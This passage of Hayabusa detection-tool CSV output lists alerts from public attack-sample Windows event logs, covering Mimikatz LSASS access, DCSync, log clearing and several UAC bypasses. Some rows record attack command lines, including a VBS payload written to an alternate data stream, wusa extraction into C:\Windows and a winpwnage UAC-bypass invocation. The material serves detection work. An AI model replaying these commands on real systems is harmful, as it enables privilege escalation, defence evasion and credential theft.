SHA1=06B1640F88EDC6A7CE3303CB14A505A86B061616,MD5=E40CF1CC132F25719F86F0FC5870910D,SHA256=A89385CCD4BE489CD069C65DA10A0B952CB3DE9090EF4C9F02E1368392CD66C5,IMPHASH=481F47BBB2C9C21E108D65F52B04C448",rules/hayabusa/sysmon/alerts/1_ProcessCreated_NonExeProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-04-30 22:49:09.760 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | Process: C:\Windows\Installer\MSI4FFD.tmp | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\msiexec.exe /V | LID: 0xffe4 | PID: 3680 | PGUID: 365ABB72-D0E4-5CC8-0000-00103CB73E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-04-30 22:49:10.198 +00:00,IEWIN7,1,info,,Process Created,"Cmd: cmd | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | LID: 0xffe4 | PID: 2892 | PGUID: 365ABB72-D0E5-5CC8-0000-0010DADF3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-04-30 22:49:10.198 +00:00,IEWIN7,1,medium,PrivEsc,Always Install Elevated MSI Spawned Cmd And Powershell,,rules/sigma/process_creation_sysmon/proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-04-30 22:52:27.588 +00:00,IEWIN7,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: cmd | LID: 0xffe4 | PID: 1372 | PGUID: 365ABB72-D1AB-5CC8-0000-0010DB1E4400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-04-30 22:52:27.588 
+00:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-04-30 22:52:27.588 +00:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-02 14:48:53.950 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49178 (IEWIN7.home) | Dst: 151.101.36.133:443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 1508 | PGUID: 365ABB72-0244-5CCB-0000-00109AE70B00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 14:48:53.950 +00:00,IEWIN7,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/net_connection_win_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 14:50:17.955 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x143a | Src PID: 1508 | Src PGUID: 365ABB72-0244-5CCB-0000-00109AE70B00 | Tgt PID: 484 | Tgt PGUID: 365ABB72-8077-5CCB-0000-0010F2590000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 14:50:17.955 +00:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials 
Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 14:50:17.955 +00:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/proc_access_win_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 14:50:17.955 +00:00,IEWIN7,10,high,CredAccess,LSASS Memory Dump,,rules/sigma/process_access/proc_access_win_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 14:50:17.955 +00:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/proc_access_win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 17:21:42.678 +00:00,SANS-TBT570,1102,high,Evas,Security Log Cleared,User: student,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privilegedebug-tokenelevate-hashdump.evtx +2019-05-03 15:20:20.711 +00:00,SANS-TBT570,1102,high,Evas,Security Log Cleared,User: student,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-03 15:20:27.359 +00:00,SANS-TBT570,4672,info,,Admin Logon,User: tbt570 | LID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-03 15:20:28.308 +00:00,SANS-TBT570,4634,info,,Logoff,User: tbt570 | LID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-08 02:10:43.487 
+00:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx +2019-05-08 02:10:43.487 +00:00,DC1.insecurebank.local,4662,high,CredAccess,Mimikatz DC Sync,,rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx +2019-05-08 02:10:43.487 +00:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx +2019-05-08 02:10:43.487 +00:00,DC1.insecurebank.local,4662,high,CredAccess,Mimikatz DC Sync,,rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx +2019-05-08 02:10:43.487 +00:00,DC1.insecurebank.local,4662,high,CredAccess,Mimikatz DC Sync,,rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx +2019-05-08 02:10:43.487 +00:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx +2019-05-08 03:00:11.778 +00:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx +2019-05-08 03:00:37.572 +00:00,DC1.insecurebank.local,4742,high,CredAccess,Possible DC 
Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx +2019-05-08 03:00:37.583 +00:00,DC1.insecurebank.local,4662,high,CredAccess,Mimikatz DC Sync,,rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx +2019-05-08 03:00:37.586 +00:00,DC1.insecurebank.local,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx +2019-05-09 01:59:28.669 +00:00,IEWIN7,13,high,Persis,Bypass UAC Using Event Viewer,,rules/sigma/registry_sysmon/registry_set/registry_set_bypass_uac_using_eventviewer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 01:59:28.684 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\eventvwr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3752 | Tgt PGUID: 365ABB72-8980-5CD3-0000-0010972D1F00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 01:59:28.684 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13982 | PID: 3752 | PGUID: 365ABB72-8980-5CD3-0000-0010972D1F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 01:59:28.950 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | 
Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x1394a | PID: 3884 | PGUID: 365ABB72-8980-5CD3-0000-00105F451F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 01:59:29.090 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\eventvwr.exe"" | LID: 0x1394a | PID: 3840 | PGUID: 365ABB72-8980-5CD3-0000-0010134D1F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 01:59:29.090 +00:00,IEWIN7,1,critical,Evas | PrivEsc,UAC Bypass via Event Viewer,,rules/sigma/process_creation_sysmon/proc_creation_win_sysmon_uac_bypass_eventvwr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 01:59:29.090 +00:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 01:59:29.090 +00:00,IEWIN7,1,high,,Suspicious Process Parents,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_parents.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 02:00:01.794 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\wsqmcons.exe | Process: C:\Windows\System32\wsqmcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 272 | PGUID: 
365ABB72-89A1-5CD3-0000-001013732100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 02:07:51.131 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" /kickoffelev | Process: C:\Windows\System32\sdclt.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13982 | PID: 3836 | PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 02:07:51.131 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\sdclt.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3836 | Tgt PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 02:07:56.149 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\sdclt.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3836 | Tgt PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 02:08:00.446 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ? 
| LID: 0x1394a | PID: 2264 | PGUID: 365ABB72-8B80-5CD3-0000-001065512A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 02:08:00.446 +00:00,IEWIN7,1,medium,PrivEsc,Sdclt Child Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 02:52:18.765 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 1900 | PGUID: 365ABB72-9570-5CD3-0000-00103FC90A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:18.844 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 1292 | PGUID: 365ABB72-95E2-5CD3-0000-001097410F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:18.922 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3636 | PGUID: 365ABB72-95E2-5CD3-0000-0010C6440F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:18.953 +00:00,IEWIN7,1,info,,Process Created,"Cmd: 
""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3620 | PGUID: 365ABB72-95E2-5CD3-0000-001083470F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:18.969 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2420 | PGUID: 365ABB72-95E2-5CD3-0000-001074490F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:19.250 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13aa4 | PID: 3536 | PGUID: 365ABB72-95E3-5CD3-0000-00100C650F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:21.250 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" C:\Windows\System32\wscript.exe C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3828 | PGUID: 365ABB72-95E5-5CD3-0000-00101F720F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:21.265 
+00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3824 | PGUID: 365ABB72-95E5-5CD3-0000-00108F720F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:21.281 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2852 | PGUID: 365ABB72-95E5-5CD3-0000-001065730F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:21.297 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2364 | PGUID: 365ABB72-95E5-5CD3-0000-001033750F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:21.594 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13aa4 | PID: 2800 | PGUID: 365ABB72-95E5-5CD3-0000-0010E1890F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 
02:52:23.500 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData:tghjx5xz2ky.vbs | Process: C:\Windows\system32\cmd.exe | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:23.500 +00:00,IEWIN7,15,info,,Alternate Data Stream Created,Path: C:\Users\IEUser\AppData | Process: C:\Windows\system32\cmd.exe | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00 | Hash: Unknown,rules/hayabusa/sysmon/events/15_AlternateDataStreamCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:23.500 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /C ""echo Dim objShell:Dim oFso:Set oFso = CreateObject(""Scripting.FileSystemObject""):Set objShell = WScript.CreateObject(""WScript.Shell""):command = ""powershell.exe"":objShell.Run command, 0:command = ""C:\Windows\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest"""""""""":objShell.Run command, 0:Set objShell = Nothing > ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:23.500 +00:00,IEWIN7,1,low,Evas,Cmd Stream Redirection,,rules/sigma/process_creation_sysmon/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:23.500 +00:00,IEWIN7,1,low,Disc,Redirect Output in 
CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 02:52:23.531 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /C ""C:\Windows\wscript.exe ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3784 | PGUID: 365ABB72-95E7-5CD3-0000-001004970F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 03:25:24.896 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3184 | PGUID: 365ABB72-9DA4-5CD3-0000-00102E692F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-09 03:25:25.067 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /name Microsoft.BackupAndRestoreCenter | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\sdclt.exe"" | LID: 0x13add | PID: 2920 | PGUID: 365ABB72-9DA4-5CD3-0000-00107F7A2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-09 03:25:25.067 +00:00,IEWIN7,1,medium,PrivEsc,Sdclt Child Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-10 12:21:57.077 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 7 -p c:\Windows\System32\cmd.exe | Process: 
C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a4f | PID: 4076 | PGUID: 365ABB72-6CE5-5CD5-0000-00104BC61B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 12:22:02.434 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe | Process: c:\python27\python.exe | PID: 4076 | PGUID: 365ABB72-6CE5-5CD5-0000-00104BC61B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 12:22:02.434 +00:00,IEWIN7,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 12:22:08.465 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\users\ieuser\appdata\local\temp\system32\mmc.exe"" ""c:\users\ieuser\appdata\local\temp\system32\perfmon.msc"" | Process: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\perfmon.exe"" | LID: 0x13a11 | PID: 1644 | PGUID: 365ABB72-6CF0-5CD5-0000-0010140F1C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 12:22:08.465 +00:00,IEWIN7,1,low,Exec,Process Start From Suspicious 